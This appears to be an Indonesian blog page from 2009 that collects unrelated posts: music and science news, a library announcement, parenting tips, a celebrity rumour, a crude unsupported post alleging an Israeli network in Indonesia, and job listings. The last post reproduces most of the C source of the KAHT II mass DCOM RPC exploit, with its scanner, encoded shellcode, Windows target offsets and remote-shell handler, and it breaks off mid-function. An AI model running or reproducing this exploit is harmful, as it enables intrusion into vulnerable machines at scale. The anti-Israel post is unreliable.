feedburner
Enter your email address:

Delivered by FeedBurner

feedburner count

dewa 19 kalahkan Queen and The Rolling Stone

Jakarta - Kepercayaan diri musisi Ahmad Dhani memang tinggi. Ia mengatakan kalau band Dewa 19 yang dipimpinnya lebih sukses dari Queen dan The Rolling Stone.

"Satu-satunya band di dunia yang sukses yah cuma Dewa 19, bukan The Rolling Stone atau Queen," ucapnya saat ditemui di Jakarta Convention Center, Senayan, Jakarta Selatan, Sabtu (30/5/2009) dinihari.

Maksud ucapan Dhani itu tentu bukan untuk meremehkan prestasi Queen dan The Rolling Stone. Kesuksean Dewa 19 yang dimaksud Dhani ialah bagaimana keberhasilan para personel band asal Surabaya itu bersolo karier tanpa melupakan 'rumah' pertama mereka.

"Anak-anak Dewa itu anak-anak yang hebat. Buktinya Dewa masih berjalan walaupun personelnya masing-masing punya proyek solo dan sukses di proyek solonya itu," tegasnya.

Seperti diketahui, vokalis Dewa 19, Once, sibuk dengan proyek solo kariernya. Prestasi Once bersolo karier juga tak jelek-jelek amat. Yang paling menonjol adalah Andra. Gitaris Dewa 19 itu makin asyik dan serius dengan band ciptaannya, Andra and The Backbone.

Pernyataan Dhani itu sekaligus membantah anggapan eksistensi Dewa 19 makin tenggelam seiring makin banyaknya band-band baru. Dhani mengaku masih aktif menulis lagu untuk Dewa 19.

Hanya saja, selain karena kesibukan para personelnya, Dhani juga belum menemukan sosok produser dan penata musik yang cocok dengannya.

source: http://music.detikhot..com/read/2009...-rolling-stone

Gunung Raksasa Bawah Laut Pecahkan Rekor

Gunung raksasa yang ditemukan di perairan barat Sumatera mungkin memecahkan rekor sebagai gunung berapi terbesar di Indonesia. Demikian menurut Pusat Vulkanologi dan Mitigasi Bencana Geologi (PVMBG) Badan Geologi Departemen Energi dan Sumber Daya Mineral.

"Gunung Kerinci yang tingginya sekitar 3.800 meter dan Gunung Semeru sekitar 3.600 meter kalah dengan gunung yang baru ditemukan di perairan Bengkulu tersebut. Kalau gunung ini memang benar gunung api, maka gunung ini merupakan gunung api terbesar di Indonesia," kata Kepala PVMBG Badan Geologi, Bandung, Surono di Jakarta, Jumat (29/5).

Lokasi gunung tersebut berada di Palung Sunda di barat daya Sumatera, terletak kira-kira 330 km dari Bengkulu. Tingginya diperkirakan 4.600 meter dengan puncaknya ada di kedalaman 1.280 meter dari permukaan laut. Diameternya diperkirakan sekitar 50 km.

Ia memprediksi, gunung api yang ditemukan itu sebelumnya pernah beberapa kali meletus sehingga material-material letusannya membuat gunung itu semakin besar seperti sekarang ini. Menurut Surono, para peneliti harus meneliti lebih lanjut untuk mengetahui kepastian gunung merapi itu, seperti tingkat keaktifan magmanya, memiliki lubang pada bagian atasnya sebagai tempat untuk keluar letusan dan lainnya.

Bila gunung itu merupakan gunung berapi, lanjut Surono, akan sangat berbahaya bila meletus. Gunung api yang berada di tengah laut itu bisa menimbulkan gelombang besar di permukaan laut, bahkan tsunami. Oleh sebab itu, perlu ada perhatian serius dari pemerintah untuk mengantisipasi hal itu.

"Para peneliti juga harus melakukan pengawasan dan pemantauan mengenai kondisi gunung tersebut serta membuat peta rawan bencana di sekitar gunung itu sehingga dapat mengantisipasi hal-hal yang tidak diinginkan," ujarnya.

Surono memberikan apresiasi sebesar-besarnya kepada para peneliti dari Lembaga Ilmu Pengetahuan Indonesia (LIPI), Badan Pengkajian dan Penerapan Teknologi (BPPT), dan Departemen Energi dan Sumber Daya Mineral CGG Veritas dan Institut de Physique Globe Paris yang menemukan gunung api raksasa tersebut.

Great Indonesia

kompas..com - Indonesia bakal memiliki perpustakaan termodern, terbesar dan terindah di dunia yang akan berlokasi Universitas Indonesia (UI) Depok di areal seluas 2,5 hektar. Pihak Rektorat UI dalam siaran persnya di Jakarta, Sabtu (30/5), menyebutkan, gedung perpustakaan yang memiliki luas bangunan 30.000 m2 serta terdiri atas delapan lantai yang pemancangan tiang perdana akan dilakukan Senin (1/6) ditargetkan pembangunnya selesai pada Desember 2009.

Deputy Director Corporate Communications UI Devie Rahmawati menyatakan, proyek yang merupakan pengembangan dari perpustakaan pusat yang dibangun tahun 1986-1987 itu didanai oleh pemerintah dan industri dengan anggaran sekitar Rp 100 miliar. Gedung perpustakaan tersebut dirancang dengan konsep "sustainable building" yang mana kebutuhan energi menggunakan sumber terbarukan yakni energi matahari (solar energy) selain itu di dalam gedung tidak diperbolehkan menggunakan plastik.

Area baru tersebut bebas asap rokok, hijau serta hemat listrik, air dan kertas hingga hal inilah yang menjadikan sebagai perpustkaan terbesar, termodern dan terindah di dunia. erpustakaan pusat UI tersebut akan mampu menampung sekitar 10.000 pengunjung dalam waktu bersamaan atau sekitar 20.000 orang per hari selain itu juga akan menampung 3-5 juta judul buku.

Sistem ICT mutakhir juga akan melengkapi perpustakaan tersebut sehingga memungkinkan pengunjung leluasa menikmati sumber informasi elektronik seperti e-book, e-journal dan lain-lain. Sedangkan perpaduan gaya arsitektur yang unik serta lokasi perpustakaan di tepian danau Kenanga UI yang ditumbuhi pepohonan besar berusia 30 tahun akan merupakan keindahan bagi perpustakaan tersebut.

Menghentikan Kebiasaan Anak Merengek

Anak biasanya merengek ketika meminta sesuatu yang diinginkan atau menerima ketidakadilan.



Bagi sebagian orang tua, mendengar anak merengek menjadi hal biasa. Tapi, banyak di antara mereka yang merasa 'pusing' dengan rengekan si kecil.

Anak biasanya merengek ketika meminta sesuatu yang diinginkan atau menerima ketidakadilan. Rengekan anak untuk alasan yang sangat sederhana, menurut dokter anak, Laurel Schultz, MD, bisa menjadi cara efektif untuk mencari perhatian orang tua.

Lantas, bagaimana cara efektif untuk menghentikan anak merengek.

Schultz menjelaskan, upaya untuk mencegah anak tidak merengek bukan merupakan strategi untuk menyadarkan anak-anak, tetapi bagaimana mereka belajar berperilaku. Di sini, orang tua sering memainkan bagian penting.

Jika anak meminta sesuatu dengan sopan dan orang tua tidak merespons untuk pertama kali, anak akan makin memaksa. Sebagian kecil anak akan berteriak atau bahkan mengamuk, bila permintaan mereka tidak direspons orang tuanya.

Namun, untuk anak dengan usia lebih tua, mereka sudah memiliki kontrol diri dan cenderung tidak merengek lebih keras.

Untuk menghindari anak merengek, Schultz menyarankan orang tua untuk tidak perlu menunggu hingga anak memahami keinginannya. Adalah penting untuk menanggapi permintaan anak pada kesempatan pertama.

Jika Anda sedang menelepon atau di tengah percakapan, Anda dapat melakukan kontak mata atau jari dengan anak dengan memberikan isyarat untuk menunggu dulu dalam satu dua menit. Dengan begitu, anak menerima perhatian orang tua secepat Anda merespons permintaannya.

Namun, jika anak terus merengek, dan sebagai orang tua meyakini itu bukan merupakan suatu 'penyakit', Anda sebaiknya dapat memberikan perhatian lebih besar. Seringkali, rengekan anak merupakan sinyal untuk kembali dengan anak Anda.

Untuk itu, orang tua sebaiknya meluangkan waktu bersama anak dan melakukan kegiatan yang melibatkan mereka.

putri om biLL Gates

The pretty girl in the three pictures above is rumored to be Microsoft founder Bill Gates' daughter Jennifer Katharine. Apparently, she is not Jennifer Katharine (see pictures below) but romantic comedy “She’s All That” actress Rachel Leigh Cook. Born in 1996, Jennifer Katharine Gates is the eldest child of Bill Gates and Melinda French who got married in a lavish wedding ceremony held in Hawaii, 1994. Jennifer has a brother Rory John Gates, born in 1999 and a sister Phoebe Adele Gates, born in 2002.

israel fucking site

cek gambar disebelah >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

sekedar pembuktian klo ternyata negara israel mempunyai jaringan network diplomatic di indonesia. hati2 dan waspada!!

Lowongan kerja mei 2009

Nama Perusahaan : Nestle
Deskripsi : As the leading Food Nutrition, Health and Wellness Company, Nestle has for the past 140 years produced the best products with a passion for excellence in food safety and quality.

Lowongan untuk : Lean Manager (LM)

Lokasi Kerja di : Jakarta

Persyaratan :

* Min. S1 degree in Operation/Supply Management, Economic Management, Engineering, or other Technical/Production related discipline
* Min. 3 years of successful experience in implementing LEAN, preferably in FMCG/Food & Beverage, and process industries
* Good English communication skills both verbal and written

Detail responsibilities :

* Support and help the LEAN rollout within the market, ensuring that a continuous improvement culture is developed and sustained in each business.
* Help the LEAN champion and Value Stream Manager(s) to define the implementation timetable and roadmap.
* Do project management for the roadmap implementation across the market.
* Define steps necessary for the market to have in place its own support structure without external resource.
Assist the Value Stream Manager(s) to roll out LEAN, starting with one product family and deploying to more product families and business units.
* Lead/assist Value assessment and identify key areas of improvement in the market.
* Conduct LEAN assesment and identify key areas of improvement in the market.
* Develop and ensure application of tools/concepts with the Team Leaders and Value Stream Manager(s).
* Conduct all training modules.

Alamat Surat, dsb : Please send the application latter, CV and recent photograph to:
PO BOX 5555, Jakarta 12000
(State the Code LM on top left of the envelope)

Or email to :
recruitment@id.nestle.com

Tgl. Penutupan : 30 Juni 2009

Lowongan kerja




Download company profile kami:
http://www.4shared.com/file/10848041...ile_2009.html?



Rockafella Entertainment, promotor baru di Indonesia, akan mempromotori The All American Rejects pada bulan Agustus dan Mr. Big bulan Oktober mendatang di Jakarta dan Bali, sedang membutuhkan partner bekerja:

1. Marketing & Promotion Crew
Mengurus segala sesuatu yang berhubungan dengan pemasaran dan publikasi konser ke berbagai pihak.

2. Artist Liaison Crew
Mengurus segala sesuatu yang berhubungan dengan artis dan ridernya.

3. D-day Execution Volunteer
Melengkapi dan mengurus hal-hal yang dibutuhkan pada hari H-1, dan hari H, sampai pada pengosongan venue.
Kualifikasi sebagai berikut:
1. Pendidikan minimal SMU atau sederajat
2. Jika berkuliah, diharapkan tidak mempunyai kesibukan perkuliahan
3. Usia minimal 21 tahun
4. Mempunyai pengalaman di event organizer atau sejenisnya
5. Domisili Jakarta dan/atau Bali
6. Mempunyai kemampuan Bahasa Inggris yang baik (khusus Artist Liaison Crew)

adapun yang kami tekankan:
1. Mempunyai komitmen, dedikasi, dan motivasi yang tinggi dalam bekerja
2. Mampu bekerja secara tim
3. Siap dan sedia kapanpun dibutuhkan

Kirimkan 1 halaman CV dan lamaran lengkap anda ke:
rockafella.entertainment@gmail.com

Contact Person: Deasy - 08569806813

It's Showtime!

P.S. : Bisa bekerja Part Time, tetapi lebih diharapkan untuk bisa Full Time.

kHat script

/*

__________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
Ported to Linux by Croulder croulder[at]croulder.com
__________________________________________________



*/


#include
#include
#include
#include
#include


#ifdef WIN32
#include
#include
#include
#include
#include
#pragma comment (lib,"ws2_32.lib")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif

#define MAX_THREADS 512
#define NTHREADS 50
#define PORT 135
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL


int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
int ip1[4],ip2[4];
FILE *results; //results.txt ips con el puerto 135 abierto :D
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()



//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);


unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char winshellcode[]=
"\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
"\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
"\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
"\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
"\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
"\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
"\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
"\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
"\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
"\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
"\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
"\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
"\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
"\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
"\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
"\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00";

struct
{
char *os;
u_long ret;
} targets[] =
{
{ "[Win2k]", 0x0018759F },
{ "[WinXP]", 0x0100139d },
};



//GLOBALS...

/******************************************************************/

void banner(void)
{
printf ("_________________________________________________ \n");
printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
printf(" DCOM RPC exploit. Modified by aT4r@3wdesign.es\n");
printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
printf(" PUBLIC VERSION :P\n");
printf ("________________________________________________\n\n");

}
void usage(void)
{
printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n");
//printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
exit(1);
}


/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){

FILE *macro;
char cadena[512];
char tmp[512];
int found=0;
int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',sizeof(cadena));
fgets(cadena,sizeof(cadena)-1,macro);
cadena[strlen(cadena)-1]='\0';
if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
{
fclose(macro);
printf(" + Ejecucion de La Macro Terminada\n");
fclose(macro);return;}
if (( strncmp(cadena,"delay=",strlen("delay="))) ==0)
delay=atoi(cadena+6);

if (( strncmp(cadena,"key=",strlen("key="))) ==0)
if (( cadena+strlen("key=!"))[0]==opt)
found=1; //OUR CMDS ARE HERE! :)

if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
if (strlen(cadena)>strlen("cmd= "))
{
strcpy(tmp,cadena+4);
strcat(tmp,"\r\n");
send(sock2,tmp,strlen(tmp),0);
//printf("Enviado: %s! de tamaƱo: %i\n",tmp,sizeof(tmp));
sleep(delay);
}
}
fclose(macro);
send(sock2,"\n",strlen("\n"),0);
printf(" - Macro Done -\n");
}

sleep(25);




}

/*****************************************************************/
void show_macros(int sock2){
FILE *macro;
char cadena[512];

printf(" +______________(Available Macros)______________\n");
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',512);
fgets(cadena,sizeof(cadena)-1,macro);
if (strlen(cadena)>1)
{
cadena[strlen(cadena)-1]='\0';
if (( strncmp(cadena,"name=",strlen("name="))) ==0)
printf(" + Nombre: %s ",cadena+strlen("name="));
if ((strncmp(cadena,"key=",strlen("key="))) ==0)
printf("Trigger: %s\n",cadena+strlen("key="));
}
}
fclose(macro);
}
send(sock2,"\n",strlen("\n"),0);
sleep(10);

}
/*****************************************************************/



void macro(char opt, int sock2)
{
switch(opt)
{
case '!':
show_macros(sock2);
break;
default:
execute_macro(opt,sock2);
break;
}
}



/*****************************************************************/
void readconsole(void *sock2)
{
int l;
char buf[512];

if (AUTOHACKING) {
execute_macro('9',(int) sock2);
salir=1;
}

while(!salir)
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
salir=1;
else
{
if ( (l==3) && (buf[0]=='!') )
macro(buf[1],(int)sock2);
else
{
send((int)sock2,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
salir=1;
_endthread();
}
}
}
}

}

void enviamacro(void *sock2)
{
sleep(500);

macro(9,(int)sock2);
salir=1;
_endthread();


}

/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
int l;
char buf[512];
salir=0;
_beginthread(readconsole,4096,(void *)(int) sock2);
while (!salir)
{
if ((l=recv (sock2, buf, sizeof (buf),0))>0)
write (1, buf, l);
else sleep(100);

}
printf("\n - Connection Closed\n");
return (salir);
}
/*****************************************************************/

int main(int argc, char **argv)
{
int i,total=NTHREADS;

#ifdef WIN32
WSADATA ws;

clrscr();
#endif
banner();

if(argc<3)
usage();
#ifdef WIN32
if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
{
printf(" WSAStartup Error: %d\n",WSAGetLastError());
exit(1);
}
#endif
sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);

for(i=0;i<4;i++)
{
if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
if ( (ip2[i]>255) || (ip2[i]<0) ) usage();

}
if (argc==4) total=atoi(argv[3]);
if (argc==5) AUTOHACKING=atoi(argv[4]);

#ifdef WIN32
InitializeCriticalSection(&cs);
InitializeCriticalSection(&css);
InitializeCriticalSection(&cslog);
InitializeCriticalSection(&csshell);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
//ULTRA FAST PORT SCANNER....
if ((results=fopen("results.txt","w"))==NULL) exit(0);
printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
srand ( time(NULL) ); RPORT=INITRPORT;
printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
printf(" [+] Scan In Progress...\n");
for(i=0;i #ifdef WIN32
_beginthread(checkea,8192,(void *)i);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
while(threads>0)
sleep(100);
fclose(results);
printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);

return(0);
}


/****************************************************************************************/

//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
if (peta==-1) return;


// if (AUTOHACKING!=1)
#ifdef WIN32
struct timeval tv;
#else
struct time_t tv;
#endif
struct sockaddr_in target_ip;
int sock,sock2; //Exploit Socket && Shell Socket
unsigned short port = 135;

unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
unsigned char buf1[0x1000];
u_long tmp=1; //TIMEOUTS
FILE *w2k;
